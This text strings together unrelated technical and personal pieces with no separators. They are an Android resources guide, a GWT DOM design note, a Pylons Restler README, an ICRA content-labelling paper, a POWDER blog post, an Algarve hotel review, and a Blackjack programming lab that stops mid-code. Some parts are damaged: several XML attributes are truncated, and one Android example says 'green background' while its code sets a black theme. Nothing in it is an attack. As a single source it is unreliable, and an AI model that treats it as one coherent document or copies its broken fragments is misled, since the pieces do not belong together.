Resources are externalized from source code, and XML files are compiled into a binary, fast loading format for efficiency reasons. Strings, likewise, are compressed into a more efficient storage form. It is for these reasons that we have these different resource types in the Android platform.
This is a fairly technically dense document, and together with the Available Resources document, they cover a lot of information about resources. It is not necessary to know this document by heart to use Android, but rather to know that the information is here when you need it.
You will create and store your resource files under the appropriate
subdirectory under the
res/ directory in your project. Android
has a resource compiler (aapt) that compiles resources according to which
subfolder they are in, and the format of the file. Table 1 shows a list of the file
types for each resource. See the
Available Resources for
descriptions of each type of object, the syntax, and the format or syntax of
the containing file.
Table 1
Resources are compiled into the final APK file. Android creates a wrapper class, called R, that you can use to refer to these resources in your code. R contains subclasses named according to the path and file name of the source file.
This section describes how to use the resources you've created. It includes the following topics:
At compile time, Android generates a class named R that contains resource identifiers to all the resources in your program. This class contains several subclasses, one for each type of resource supported by Android, and for which you provided a resource file. Each class contains one or more identifiers for the compiled resources, that you use in your code to load the resource. Here is a small resource file that contains string, layout (screens or parts of screens), and image resources.
Note: the R class is an auto-generated file and is not designed to be edited by hand. It will be automatically re-created as needed when the resources are updated.
package com.android.samples;

public final class R {
    public static final class string {
        public static final int greeting=0x0204000e;
        public static final int start_button_text=0x02040001;
        public static final int submit_button_text=0x02040008;
        public static final int main_screen_title=0x0204000a;
    };
    public static final class layout {
        public static final int start_screen=0x02070000;
        public static final int new_user_pane=0x02070001;
        public static final int select_user_list=0x02070002;
    };
    public static final class drawable {
        public static final int company_logo=0x02020005;
        public static final int smiling_cat=0x02020006;
        public static final int yellow_fade_background=0x02020007;
        public static final int stretch_button_1=0x02020008;
    };
};
Using resources in code is just a matter of knowing the full resource ID and what type of object your resource has been compiled into. Here is the syntax for referring to a resource:
R.resource_type.resource_name
or, for system resources:
android.R.resource_type.resource_name
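Because R is ordinary generated Java, a resource reference compiles down to reading a nested integer constant. The sketch below hand-writes a tiny R-style class using the IDs from the sample above, purely to illustrate the mechanics; in a real project this class is generated for you and never edited:

```java
// Hand-written imitation of a generated R class (IDs copied from the
// sample above). At runtime the framework maps each ID back to the
// compiled resource; code only ever sees these int constants.
final class R {
    static final class string {
        static final int greeting = 0x0204000e;
        static final int start_button_text = 0x02040001;
    }
    static final class layout {
        static final int start_screen = 0x02070000;
    }
    static final class drawable {
        static final int company_logo = 0x02020005;
    }
}
```

So an expression like `R.string.greeting` is nothing more exotic than a compile-time int, which is why resource lookups are cheap.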
A value supplied in an attribute (or resource) can also be a reference to a resource. This is often used in layout files to supply strings (so they can be localized) and images (which exist in another file), though a reference can be any resource type including colors and integers.
For example, if we have color resources, we can write a layout file that sets the text color to the value contained in one of those resources:
<?xml version="1.0" encoding="utf-8"?> <EditText id="text" xmlns:android="http://schemas.android.com/apk/res/android" android:layout_width="fill_parent" android:layout_height="fill_parent" android:textColor="@color/opaque_red" android:text="Hello"/>
Note here the use of the '@' prefix to introduce a resource reference -- the
text following that is the name of a resource in the form
of
@[package:]type/name. In this case we didn't need to specify
the package because we are referencing a resource in our own package. To
reference a system resource, you would need to write:
<?xml version="1.0" encoding="utf-8"?> <EditText id="text" xmlns:android="http://schemas.android.com/apk/res/android" android:layout_width="fill_parent" android:layout_height="fill_parent" android:textColor="@android:color/opaque_red" android:text="Hello"/>
As another example, you should always use resource references when supplying strings in a layout file so that they can be localized:
<?xml version="1.0" encoding="utf-8"?> <EditText id="text" xmlns:android="http://schemas.android.com/apk/res/android" android:layout_width="fill_parent" android:layout_height="fill_parent" android:text="@string/hello_world"/>
This facility can also be used to create references between resources. For example, we can create new drawable resources that are aliases for existing images:
<?xml version="1.0" encoding="utf-8"?> <resources> <drawable id="my_background">@android:drawable/theme2_background</drawable> </resources>.
Many resources included with the system are available to applications. All such resources are defined under the class "android.R". For example, you can display the standard application icon in a screen with the following code:
public class MyActivity extends Activity { public void onStart() { requestScreenFeatures(FEATURE_BADGE_IMAGE); super.onStart(); setBadgeResource(android.R.drawable.sym_def_app_icon); } }
In a similar way, this code will apply to your screen the standard "green background" visual treatment defined by the system:
public class MyActivity extends Activity { public void onStart() { super.onStart(); setTheme(android.R.style.Theme_Black); } }:
MyApp/ res/ values-en/ strings.xml values-fr/ strings.xml
Android supports several types of qualifiers, with various values for each. Append these to the end of the resource folder name, separated by dashes. You can add multiple qualifiers to each folder name, but they must appear in the order they are listed here. For example, a folder containing drawable resources for a fully specified configuration would look like this:
MyApp/ res/ drawable-en-rUS-port-160dpi-finger-keysexposed-qwerty-dpad-480x320/
More typically, you will only specify a few specific configuration options. You may drop any of the values from the complete list, as long as the remaining values are still in the same order:
MyApp/ res/ drawable-en-rUS-finger/ drawable-port/ drawable-port-160dpi/ drawable-qwerty/
Table 2 lists the valid folder-name qualifiers, in order of precedence. Qualifiers that are listed higher in the table take precedence over those listed lower, as described in How Android finds the best matching directory.
Table 2:
For example, drawable-en-rUS-land will apply to US-English devices in landscape orientation.
Correct: values-mcc460-nokeys/
Incorrect: values-nokeys-mcc460/
For example, a drawable directory must be named drawable-port, not drawable-PORT or drawable-Port.
For example, to use the same files for Spain and France you need two directories named drawable-rES/ and drawable-rFR/, containing identical files. You cannot have a single directory named drawable-rES-rFR/.
Directories cannot be nested. For example, you cannot have res/drawable/drawable-en/.
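To make the ordering rule concrete, here is a small plain-Java sketch (not part of the SDK, and deliberately simplified) that checks whether a directory name lists its qualifiers in the precedence order of Table 2. Each qualifier category is matched with a crude pattern; aapt's real validation is stricter:

```java
import java.util.Arrays;
import java.util.List;

// Sketch: validates qualifier ordering in names like "drawable-en-rUS-port".
// One pattern per qualifier category, in the precedence order of Table 2.
class QualifierOrder {
    static final List<String> ORDER = Arrays.asList(
            "mcc\\d+", "mnc\\d+", "[a-z]{2}", "r[A-Z]{2}",
            "port|land|square", "\\d+dpi",
            "finger|notouch|stylus", "keysexposed|keyshidden",
            "qwerty|12key|nokeys", "dpad|trackball|wheel|nonav",
            "\\d+x\\d+");

    static boolean isValid(String dirName) {
        String[] parts = dirName.split("-");
        int next = 0; // index into ORDER; may only move forward
        for (int i = 1; i < parts.length; i++) { // parts[0] is the resource type
            int j = next;
            while (j < ORDER.size() && !parts[i].matches(ORDER.get(j))) j++;
            if (j == ORDER.size()) return false; // unknown or out-of-order qualifier
            next = j + 1;
        }
        return true;
    }
}
```

With this sketch, the correct values-mcc460-nokeys above is accepted, while the reversed values-nokeys-mcc460 is rejected because the ordering cursor cannot move backwards.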
All resources will be referenced in code or resource reference syntax by
their simple, undecorated names. So if a resource were named this:
MyApp/res/drawable-port-92dpi/myimage.png
It would be referenced as this:
R.drawable.myimage (code)
@drawable/myimage (XML)
If several drawable directories are available, Android will select one of them (as described below) and load myimage.png from it.
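The undecorated-name rule can be expressed in a few lines. This is an illustrative plain-Java sketch, not real SDK code; it simply strips the configuration qualifiers and file extension from a source path to produce the two reference forms:

```java
// Sketch: derives the R.* and @type/name reference forms from a resource
// path, ignoring any configuration qualifiers in the directory name.
class ResourceName {
    static String codeRef(String path) {
        String[] parts = path.split("/");
        String dir = parts[parts.length - 2];     // e.g. "drawable-port-92dpi"
        String type = dir.split("-")[0];          // qualifiers are dropped
        String file = parts[parts.length - 1];
        String name = file.substring(0, file.lastIndexOf('.'));
        return "R." + type + "." + name;
    }

    static String xmlRef(String path) {
        String code = codeRef(path).substring(2); // "drawable.myimage"
        return "@" + code.replace('.', '/');
    }
}
```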
Android will pick which of the various underlying resource files should be used at runtime, depending on the current configuration of the device. The example used here assumes the following device configuration:
Locale =
en-GB
Screen orientation =
port
Screen pixel density =
108dpi
Touchscreen type =
notouch
Primary text input method =
12key
Here is how Android makes the selection:
1. Eliminate directories that contradict the device configuration. The drawable-fr-rCA/ directory is eliminated, because it contradicts the locale of the device. That leaves:
MyApp/res/drawable/
MyApp/res/drawable-en/
MyApp/res/drawable-en-port/
MyApp/res/drawable-en-notouch-12key/
MyApp/res/drawable-port-92dpi/
MyApp/res/drawable-port-notouch-12key/
Exception: Screen pixel density is the one qualifier that is not used to eliminate files. Even though the screen density of the device is 108 dpi, drawable-port-92dpi/ is not eliminated from the list, because every screen density is considered to be a match at this point.
2. Pick the highest-precedence qualifier from Table 2 that has not yet been considered (starting with MCC and working down the list).
3. Do any of the remaining directories include this qualifier? If not, return to step 2 and try the next qualifier. If so, eliminate the directories that do not include it. In this example, the first qualifier that any directory includes is language, which leaves:
MyApp/res/drawable-en/
MyApp/res/drawable-en-port/
MyApp/res/drawable-en-notouch-12key/
Exception: If the qualifier in question is screen pixel density, Android will select the option that most closely matches the device, and the selection process will be complete. In general, Android will prefer scaling down a larger original image to scaling up a smaller original image.
4. Repeat steps 2 and 3 until only one directory remains. The next qualifier for which any directory exists is screen orientation; eliminating the directories that do not specify port leaves:
MyApp/res/drawable-en-port/
Only one choice remains, so that's it. When drawables are called for in this example application, the Android system will load resources from the MyApp/res/drawable-en-port/ directory.
Tip: The precedence of the qualifiers is more important than the number of qualifiers that exactly match the device. In step 3 above, drawable-port-notouch-12key matches three of the device's qualifiers exactly, but language has higher precedence, so drawable-port-notouch-12key is out.
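The elimination walk-through above can be simulated in plain Java. The sketch below is an illustrative re-implementation, not the platform's actual code: it treats qualifiers as opaque strings supplied in precedence order and models the density exception by never letting a dpi qualifier eliminate a candidate:

```java
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;

// Sketch of the directory-elimination algorithm described above.
class BestMatch {
    static String pick(String[] dirs, String[] deviceQualifiers) {
        List<String> device = Arrays.asList(deviceQualifiers);
        List<String> remaining = new ArrayList<>();
        for (String d : dirs) {                 // step 1: drop contradictions
            boolean contradicts = false;
            for (String q : qualifiersOf(d)) {
                if (q.endsWith("dpi")) continue; // density never eliminates here
                if (!device.contains(q)) contradicts = true;
            }
            if (!contradicts) remaining.add(d);
        }
        for (String q : device) {               // steps 2-4: precedence order
            List<String> withQ = new ArrayList<>();
            for (String d : remaining)
                if (qualifiersOf(d).contains(q)) withQ.add(d);
            if (!withQ.isEmpty()) remaining = withQ; // eliminate non-matches
            if (remaining.size() == 1) break;
        }
        return remaining.get(0);
    }

    static List<String> qualifiersOf(String dir) {
        List<String> parts = new ArrayList<>(Arrays.asList(dir.split("-")));
        parts.remove(0); // drop the resource type, e.g. "drawable"
        return parts;
    }
}
```

Feeding it the example's directory list and the device's qualifiers in precedence order (en, rGB, port, notouch, 12key) reproduces the walk-through's answer, drawable-en-port.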
This flowchart summarizes how Android selects resource directories to load..
The Available Resources document provides a detailed list of the various types of resource and how to use them from within the Java source code, or from other references.
Coming Soon: Internationalization and Localization are critical, but are also not quite ready yet in the current SDK. As the SDK matures, this section will contain information on the Internationalization and Localization features of the Android platform. In the meantime, it is a good idea to start by externalizing all strings, and practicing good structure in creating and using resources.
Joel Webber, Bruce Johnson
Recent enhancements to GWT's treatment of the JavaScriptObject (JSO) class in GWT 1.5 have made it possible to extend JSO with user-defined subclasses having arbitrary methods.
The GWT 1.5 UI library uses this newfound capability to more accurately model the W3C Node and HTML Element type hierarchy. In addition to aesthetic improvements in GWT-based DOM coding, the new model provides a more consistent and reliable cross-browser DOM API than JavaScript/DHTML itself because it builds on GWT's deferred binding approach to browser quirks specialization.
This enhancement involves the introduction of a new class hierarchy that extends the JavaScriptObject class. A sketch of the hierarchy is listed below, although individual methods are too numerous to list. (See the related patch for full details.). These class names mirror the W3C HTML specification (including their inconsistencies, such as LIElement vs. OListElement).
JavaScriptObject
Node
Text
Document
Element
AnchorElement
BodyElement
ButtonElement
DivElement
FieldSetElement
FormElement
IFrameElement
ImageElement
InputElement
LabelElement
LegendElement
LIElement
OListElement
OptionElement
SelectElement
SpanElement
TableCaptionElement
TableCellElement
TableColElement
TableElement
TableRowElement
TableSectionElement
TextAreaElement
UListElement
Event
NodeList
Style
These classes take advantage of GWT's new JavaScriptObject method support to directly implement DOM methods such as appendChild(), setAttribute(), and so forth.
This new, more explicit model has many benefits. Most obviously, the new classes clean up the aesthetics of DOM coding in Widget implementations and other straight-to-the-DOM programming tasks.
Consider this example of a previous implementation from GWT 1.4:
Element getCellElement(int row, int col) {
return DOM.getChild(DOM.getChild(tbody, row), col);
}
This looks much nicer when rewritten in GWT 1.5 like so:
Element getCellElement(int row, int col) {
return tbody.getChildElement(row).getChildElement(col);
}
Prior to GWT 1.5 JSO improvements, GWT developers often needed to use JSNI to accomplish low-level operations in JavaScript. For example,
private native Element getCellElement(Element table, int row, int col) /*-{
var out = table.rows[row].cells[col];
return (out == null ? null : out);
}-*/;
This has a few disadvantages:
The new JSO support and Element subclasses allow the same code to be written fully in Java code:
private Element getCellElement(TableElement table, int row, int col) {
return table.getRows().getItem(row).getCells().getItem(col);
}
All of the above objects, with the exception of JavaScriptObject and Event, will be created in the com.google.gwt.dom.client package. Part of the DOMImpl abstraction (and its related browser-specific implementations) will be moved into this package as well.
For backwards compatibility, all existing interfaces (i.e. DOM, Element, and Event) will remain in the com.google.gwt.user.client package, with the following changes:
The only required change to the user.client.ui package will be to loosen the type of the argument to setElement() (it will accept dom.client.Element), add an overload of setElement() that takes user.client.Element (so that existing classes that override it will not break), and add a getRootElement() that will return dom.client.Element.
These changes are 100% backwards compatible with existing code. One slightly unfortunate side-effect of this is that UIObject.getStyleElement() still returns user.client.Element. It is tempting to replace its return type with dom.client.Element (existing overrides would remain correct through covariance), but this would run the risk of breaking callers (see the next section for an example of how you can deal with this in practice).
If there are now two Element classes, which one should I use? For new code, you can always use dom.client.Element. The old Element class has no new methods on it, so you lose nothing by doing this, and gain direct convertibility (through a simple typecast) to its subtypes (e.g. ButtonElement).
Converting existing code to use Element methods (instead of calls to static DOM methods) is very straightforward. Almost all static DOM methods have obvious equivalents on dom.client.Element. The only exceptions are event handling methods (see below) and the methods that allow you to enumerate child Elements by index. These latter methods are not directly exposed in the Element API because they were not a great idea in the first place -- they look like they should run in constant time but are in fact linear time on all browsers other than IE.
If you do need to work with both Element types in the same code (which should occur very rarely), keep in mind that they're freely convertible because of the way JavaScriptObject works (see JavaScriptObjectRedesign for details).
The Event object has also been extended to provide methods to directly access its properties and functions. It also contains static helper methods for sinking events on Elements (specifically, sinkEvents() and getEventsSunk()). This object was not moved into the dom package because it is not clear that this is the best, or only, way to deal with Javascript event handling.
The above changes will not affect existing widgets (the only change to user.client.ui being the aforementioned tweaks to UIObject). Once these changes are committed, we can update the existing widgets to use the new interfaces. This will be effectively a no-op, but lead to much easier to read widget code.
All of these changes would be worthless if they imposed any performance or size overhead on the JavaScript produced by the GWT compiler. Fortunately, the compiler has gotten very good at throwing away extra levels of abstraction. The following examples of compiled output confirm this in practice.
The first example uses the existing DOM methods to manipulate a <button> element:
com.google.gwt.user.client.Element elem = DOM.createButton();
DOM.setStyleAttribute(elem, "color", "green");
DOM.setInnerText(elem, "foo!");
DOM.appendChild(RootPanel.getBodyElement(), elem);
The second uses the new Element interfaces to do the same thing:
com.google.gwt.dom.client.ButtonElement elem = Document.get().createButtonElement();
elem.getStyle().setAttribute("color", "green");
elem.setInnerText("foo!");
Document.get().getBody().appendChild(elem);
The following is the compiled output on Internet Explorer. Note that it's identical in both cases.
var elem = $doc.createElement('button');
elem.style['color'] = 'green';
elem.innerText = 'foo!';
$doc.body.appendChild(elem);
RESTful + Controller = Restler
Restler is a base controller for Pylons projects that provides a set of default RESTful actions that can be overridden as needed.
Quick Start
Install Pylons 0.9.7
easy_install Pylons==dev
Development of Restler is currently done with Pylons 0.9.7rc1dev
Install Restler
easy_install -U Restler
Or, install from the latest trunk:
svn checkout Restler cd Restler python setup.py develop
Note: If you have problems with the easy_installed version of Restler, try the SVN version, which may have fixes that I haven't yet uploaded to PyPI.
Create a new Pylons project
paster create --template=pylons MyProject cd MyProject
Add your database configuration to development.ini
Add a line like this to the [app:main] section:
sqlalchemy.dburi = <db_type>://<user>:<password>@<host>/<database>
Replace <db_type>, <user>, <password>, <host>, and <database> to reflect your setup. For example:
sqlalchemy.dburi = sqlite:///%(here)s/myproject.db
Create a base RestController that's aware of your project's model
Open myproject/lib/base.py and add the following lines below the existing imports:
import restler
RestController = restler.make_rest_controller(model)
You can also create a new RestController class in lib.base that inherits from restler.BaseController. Here's an example that shows a quick and dirty way to secure the actions that cause modifications:
class RestController(restler.make_rest_controller(model)):
    def __call__(self, environ, start_response):
        return super(RestController, self).__call__(environ, start_response)
    new = edit = create = update = delete = lambda *args, **kwargs: abort(403)
In real life, you'll probably want to use AuthKit or something similar to protect these actions.
Note: The default BaseController generated by paster when creating a new Pylons project is used by the default error and template controllers.
Create some SQLAlchemy mapped ORM classes in model/__init__.py
Create a controller for each of the Entity classes declared above
Map URLs for resources/entities to controllers
Create the database tables for the entity classes you declared above
Fire up your Pylons app and try it out
paster serve --reload development.ini
You should now be able to Create, Read, Update, and Delete resources.
Look at all the things I'm not doing
Epilogue
Restler was originally extracted from the byCycle.org Bicycle Trip Planner.
Send feedback, corrections, et cetera to wyatt .DOT. lee .DOT. baldwin .AT. gmail .DOT. com or create an issue.
Since 1999, ICRA has operated the internet's leading system of self-labelling for the purposes of child protection. Like its predecessor organisation, RSACi, and other online labelling systems, ICRA has used the PICS Recommendations to encode its labels.
ICRA acknowledges that take-up of labelling has been limited. Although several high profile websites carry ICRA's labels, few are "fully labelled" in terms that a PICS-based filter would understand. There are several reasons for this that were discussed in detail at a workshop at WWW2004.
Neither has ICRA labelling been used to its full potential, notably in content adaptation. This is unfortunate since the potential is significant. If a delivery system were aware that content of a particular type should not be offered, perhaps in the children's section of a website, then alternatives can be automatically identified and provided. In this way the user sees customised content and the provider keeps their audience.
In June this year, under the chairmanship of David Young of Verizon, ICRA established a working group to explore improved methods of labelling that would overcome both the technical problems associated with PICS and the logistical problems faced by large organisations who wish to label their content. By working on solutions to this problem, ICRA believes that while maintaining its focus on child protection it can make a real contribution to the wider issues of associating metadata with content.
Various methods of linking RDF to web resources, especially HTML documents, have been suggested. Simply embedding RDF in an (X)HTML document breaks the Doc Type and is not a satisfactory solution. Using namespace defined meta tags, as recommended by the Dublin Core initiative for example, has two key drawbacks:
The Recommendation is that descriptions should be held in discrete files and that resources should point to them. However, the assumption at the heart of RDF is that each resource has its own unique description. Content labelling for child protection and other purposes calls for the ability to associate a single label with an unlimited number of resources for which the same meta data applies. There are a lot of PG-13 films, but the Motion Picture Association of America only has one PG-13 rating.
ICRA contends that the ideal system for delivering labels of this type - ones that can be applied to multiple resources - will have a number of features that, in addition to helping to empower parents to make choices about what their children do and don't see online, would be directly applicable to content adaptation and other metadata applications. A single description should be able to cover all resources within a defined domain, subdomain, path etc. Furthermore, it should be possible to override a description applied at domain level at the document level.
The working group has made significant progress towards realising these desirable features but recognises that further work needs to be done. We have devised and tested two candidate solutions that complement each other.
In both candidate solutions, the description(s) are held in a separate file - an RDF/XML instance. A content provider might define, say, 3 or 4 descriptions that describe their material and these are encoded within that single file. From an ICRA point of view, these would declare the type of content present, but they could just as easily convey any metadata that applied to multiple resources. Such a file would be retrieved once by a client and processed internally rather than being fetched repeatedly for each request to the network. The two candidate solutions differ in the way in which the labels are linked to the content they describe.
In this scenario, content includes a pointer (in its header information) to one of the descriptions (or the single description) in the RDF file. Any number of resources can point to a given description and, for a given description, the pointer is identical. The content management system/webmaster retains the responsibility for including a pointer that links the content to the correct description.
In this scenario the descriptions include extra information about where they should be applied. Therefore a content provider can arrange for the same pointer to be included with all content, irrespective of the description it should have. Within the description there would be data that encodes rules such as 'everything on our domain should have description A except things with the word "chatroom" in them which should have description B.' The responsibility for labelling content correctly can then be passed to an individual or department who may themselves have no direct access to or control over the content, just the descriptions for it.
Basic demonstration-standard tools have been devised to generate these descriptions and to locate and parse them.
If a user declares that his/her device has particular properties, perhaps using CC/PP, or that they prefer a text only version of a site, they disclose simply how they can or prefer to receive the material offered. If, however, the user discloses that, for example, sexual material, gambling services or other content types are not wanted, they disclose information about themselves. This constitutes a loss of privacy that might be regarded as acceptable by many users if it improved the ratio of wanted to unwanted material received.
However, if the profile of the user indicated that he/she was probably a young child, would that increase or decrease their vulnerability on the web?
The possibility that it would actually make children more vulnerable, particularly to paedophile activity, currently prevents ICRA from advocating that filter settings should be disclosed when making requests to the web. If there is a way around this problem however, the potential of ICRA labelling for content adaptation becomes significantly greater.
ICRA and others are working on a system that allows metadata to be associated with multiple resources. This metadata, expressed in RDF/XML, offers the potential for uses that reach from content labelling for child-protection purposes, through to discovery metadata, copyright, trust marks etc. all of which can have direct bearing on content adaptation.
Phil Archer, CTO, ICRA
7th September 2004
The POWDER Working Group has had three key meetings in the last 9 days.
A quick reminder - POWDER is designing a lightweight system that will enable RDF triples to be applied to groups of resources, typically all those available from a given Web site. Critically, the data will be open to authentication so that when Organization A says that Web site B has properties C, D and E, a machine will be able to seek authentication from Organization A that they really did say that. Think of it as the automated/Semantic Web version of 'Click to Verify' when you see a trustmark on a Web site.
At the first of these meetings we agreed on a coordination step with the Web Application Formats Working Group relating to their Enabling Read Access document. We also made significant progress towards defining the details of the structure of a Description Resource (a more detailed summary of this meeting is also available).
We also had a public event, jointly sponsored by CTIA. This “Stakeholder Meeting” presented several use cases and discussed the potential—and potential problems—of the new protocol. A full report is available.
Finally, a meeting was held with the Mobile Web Best Practices Working Group to discuss mobileOK. This is a key use case for POWDER as it encodes a claim that a group of resources are conformant with Mobile Web Best Practice.
As a result of all these meetings, it’s possible to present a sample Description Resource. One or two minor details have yet to be finalized but this is a good snapshot.
<wdr:DR>
  <foaf:hasMaker rdf:
  <dcterms:issued>2007-07-17</dcterms:issued>
  <wdr:validFrom>2007-07-21</wdr:validFrom>
  <wdr:validUntil>2008-05-21</wdr:validUntil>
  <wdr:hasScope>
    <wdr:ResourceSet>
      <wdr:includeHosts>example.org</wdr:includeHosts>
    </wdr:ResourceSet>
  </wdr:hasScope>
  <wdr:hasDescriptors rdf:
  <dc:description>example.org conforms to the mobileOK Basic standard, meaning that basic steps have been taken to provide a functional user experience for users of basic mobile devices</dc:description>
  <foaf:depiction rdf:
</wdr:DR>
The namespace declarations are omitted for clarity, but wdr represents the POWDER namespace (it's an abbreviation of Web Description Resources).
Some elements are mandatory:
- the maker (foaf:maker)
- the scope (wdr:hasScope and the Resource Set it points to)
- the descriptors (wdr:hasDescriptors, which has a range of a Class called 'Descriptors')
All other elements are optional; however, an issue date and a valid-until date SHOULD be there.
The most tricky and contentious aspect of all this is likely to be the Resource Set definition. As noted in a blog last week, the relevant document is now a first public working draft. The ambitious target is to get a working draft of the Description Resources document into the public domain around the end of the month.
I had never been to the Algarve before (and never really fancied it much) but the chance of a cheap winter break, with sensible flight times coupled to the “rave reviews” of this hotel on trip adviser sold it to me. So off we went on 28th Feb 2008 till 6th March 2008. This is a good hotel – but I don’t think it is quite as good as the reviews led me to believe.
The hotel is currently surrounded by major building work. Very surprising that no previous reviewer had seen this as a problem – it would have changed my holiday plans for sure! On the plus side the work is due to finish in March on the Porto Bay but this will create another 500 ish rooms in the close vicinity of the hotel. The work on the Riu Club is due to finish in the "summer". This will introduce another 500 ish rooms so the area will be a lot busier. Parking for our hire car (booked on arrival in the hotel with Hertz – 126 Euro for 4 days) was at times tight during our holiday, in part due to the building works. When these 2 hotels open it will be a nightmare!
We arrived at check in at 14.00 and were given a room straight away but we were warned on the coach that check in time is 16.00 and so in the high season you may have to wait for a room. Contrary to a previous reviewer we found that the room safe was not free but was 16 euros for a week. He must have been lucky and reception had forgotten to lock it.
The glass of cava at check in was a nice touch but we had to ask (quite forcibly) for the 18.00 dinner sitting. The receptionist was keen to slot us into the 20.00 sitting. We discovered later that the early sitting seems to be favoured by the German visitors and we got the distinct impression that they got preferential treatment in this respect at least. The Thomson Rep gave us check in forms to fill in on the coach which saved a bit of time as there were around 20 of us on the coach. There was normally only 1 receptionist on duty so queues did occur. On this occasion though a second member of staff appeared and helped out so there was little delay.
Our room was on the West side of the hotel and fairly large, very clean and comfortable. The aircon was switched off for the winter so if the room was too hot there was a ceiling fan which helped. The weather was kind to us so we had a week of temperatures in the low 20s almost every day and the sun in our room in the afternoon so it did get a bit warm at times. Outside the rooms on this side of the hotel in the garden was a bank of 12 large aircon fan units which were not all in use due to it being winter but beware in the summer as they will be very noisy! Across the valley there is a school on this side of the hotel so after 15.00 (till about 17.30) the children seemed to have sports outside. A quiet sit on the balcony was therefore impossible.
On our first night we turned up at 18.00 for dinner to be met by the whole group of kitchen and waiting staff lined up to greet us for dinner. This took place every night and was another nice friendly touch. As it was our first night we asked for a table and the head waiter allocated us to a table and instructed a waiter to show us to it. We had just sat down when another head waiter arrived to tell us we were at the wrong table and told us to move to another table. Having been shown there by the waiter and sat down again another guest arrived and told us that this was her table so we were shown to yet another table which we eventually kept for the rest of our stay. The food was good but not great, which I would say of every buffet I have had. Help yourself to soup and/or salad, then there was the possibility of waiter service for a choice of 2 main courses. The food served by the waiter was by and large the same as that on the show cooking so not a big deal really. The desserts were the usual buffet selection with lots of plastic cream. Many of the dishes tasted identical even if they were a different colour! They did lay on a hot dessert every night which was unusual, but it was the same/similar every night: a large scoop of ice cream, covered in a hot sauce containing fruit, finished off with a generous measure of brandy!
The restaurant did have a school dining hall feel to it. The Germans started queuing up about 17.50 and rattled the door if it wasn’t open at 18.00 precisely. There was then a rush to the buffet and a bit of a scrum for the first 10 minutes. There was always a good choice on the buffet and a reasonable amount of variation. The dining room was a bit noisy and stuffy at times I think due to the lack of aircon at this time of year – opening the doors onto the terrace would have helped but I don’t think they wanted us outside either for dinner or breakfast.
Wine in the restaurant starts about 11euro a bottle but pay a bit more if possible. Beer is 2.20 euro and a small bottle of water is 1.90euro. These are added to your bill at check out but make sure you keep the receipts and check your bill. Mine was wrong and so were several other couples we spoke to! Tap water is not drinkable so you have to buy water but it is very cheap in the supermarkets –as is the wine and beer.
Breakfast (08.00 – 10.30) was fine with plenty of choice and a glass (or 2?) of cava available. The bacon was the usual continental variety, mostly fat. The croissants are to be avoided – one I had was more like naan bread! There were no problems with tables as you sit anywhere, but some mornings they seemed to be short staffed and there was a shortage of clean tables by 09.00.
Like most of the Algarve the village is now a long way from a little fishing village – hotels and apartments are taking over. There are 2 supermarkets and quite a few restaurants and bars. During our week most of the bars closed by 20.00 so we couldn’t go for a walk and drink after dinner.
We enjoyed our week and toured most of the sights but if I was to return (unlikely) I would go for the Sheraton hotel. It has a better location and is not surrounded by other large hotels – it will no doubt be more expensive however.
In this lab, you will write a program which plays the card game of Blackjack.
The program will present a GUI interface which will allow an interactive
user to play a game of Blackjack against the computer, which will act as the
dealer.
In case you don't know the rules of BlackJack, it works like this. You start with a hand of 2 cards. The value of a hand is the sum of the values of its cards: 10 for face cards (Jacks, Queens and Kings), 1 or 11 for Aces, and the face value for the rest. You can ask for as many additional cards as you like, one at a time, and stop whenever you like. The goal is to bring the value of your hand as close to 21 as you can without exceeding 21. After you have taken as many cards as you like the dealer repeats this process with her own hand. The winner is the player who comes closest to 21 without going over.
To implement the game, you'll write a group of classes to model important components of the game:
The dealer deals two cards to each player and to himself. (In our case,
we will just have one player, the interactive user.) The dealer shows
one of his cards face up, the other is kept face down.
Each player then has the opportunity to request additional cards from the dealer. The player has the choice of requesting a Hit; that is, an additional card, or to Stand; that is, to finish his turn and keep his hand as it is.
Eventually, the player either busts or stands pat. A bust is an automatic loss. If the player stands without busting, the dealer then plays his hand. The dealer has the same choices (hit or stand) that the other players do. If the dealer busts, the player wins. Otherwise, the hand with the highest value wins. If the dealer's hand and the player's hand have the same value, the game is a "push" (a tie game), and the player's bet is returned. (Note: A hand with Blackjack beats a hand with 21, but not Blackjack.)
If you download the jar file and expand it, you will find the following files:
BlackJackInterface.java This is a GUI interface for the game; you do not need to change anything in this file.
BlackJack.java This plays a game of BlackJack using the rules above. You don't need to change anything in this file or to add to it, but since it refers to the classes you need to build you may want to see how it is using them. The main() method for the BlackJack program is in this class.
The BlackJack.java file makes references to three other classes: Card (a single playing card), Deck (a pack of 52 Cards), and Hand (a list of Cards). Your job in this lab is to implement these three classes, according to the descriptions given below. Do not change the names of the methods, or your BlackJack class will not be able to find the methods it needs. When these three classes are fully implemented you should have a working BlackJack game. Meanwhile, I have made suggestions for including temporary main() methods in each of the classes as you build them to help debug them. These temporary main() methods should be deleted (or commented out) after you are confident that each class is functioning properly.
Write the following methods for Card:
1. Card(int suit, int rank); This is a constructor to initialize the suit and rank of a card.
2. int value(); This method returns the value of the Card in the game of BlackJack. (Ace=11, Two=2, ... , Ten=10, Jack=10, Queen=10, King=10). Don't worry for now that an Ace might be valued at 1 or 11; just use value 11 for Aces.
3. String toString(); This method should return a String representing the Card, in the form
Ace of Hearts
Three of Diamonds
King of Clubs
etc.
Suggestion: Set up static final arrays of the suit names and rank names. For example,
private static final String[] suits = { "Clubs", "Diamonds", "Hearts", "Spades" };
A suit name can then be obtained from the suits array by using the suit code as an index. Ranks can be handled in the same way.
4. main(String[] args); For testing only, write a main method which creates two or three cards and writes them to System.out using the toString method. Once you are sure this class is implemented correctly, remove this main() method.
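As an illustration of items 2 and 3 above, here is one way value() and toString() might look. The field names and the rank encoding (0 = Ace through 12 = King) are assumptions made for this sketch; the lab does not fix the encoding, so adapt it to your own constructor.

```java
// Hypothetical sketch of Card's value() and toString(); the rank
// encoding (0 = Ace ... 12 = King) is an assumption, not a lab requirement.
public class CardSketch {
    private static final String[] SUITS = { "Clubs", "Diamonds", "Hearts", "Spades" };
    private static final String[] RANKS = { "Ace", "Two", "Three", "Four", "Five",
        "Six", "Seven", "Eight", "Nine", "Ten", "Jack", "Queen", "King" };

    private final int suit;  // 0..3, index into SUITS
    private final int rank;  // 0..12, index into RANKS

    public CardSketch(int suit, int rank) {
        this.suit = suit;
        this.rank = rank;
    }

    // BlackJack value: Ace = 11 (for now), face cards = 10, others face value.
    public int value() {
        if (rank == 0) {
            return 11;                   // Ace
        }
        return Math.min(rank + 1, 10);   // Two..Ten -> 2..10; Jack/Queen/King -> 10
    }

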